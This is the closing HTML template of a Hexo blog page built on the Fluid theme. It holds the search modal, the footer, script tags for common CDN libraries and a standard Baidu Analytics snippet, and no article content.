        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.3/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.1/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script  src="/js/local-search.js" ></script>






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.12/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>












  
    <!-- Baidu Analytics -->
    <script defer>
      var _hmt = _hmt || [];
      (function () {
        var hm = document.createElement("script");
        hm.src = "https://hm.baidu.com/hm.js?ee9387c15cc7097331ccc74141d07081";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
      })();
    </script>
  

  

  

  

  

  





<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
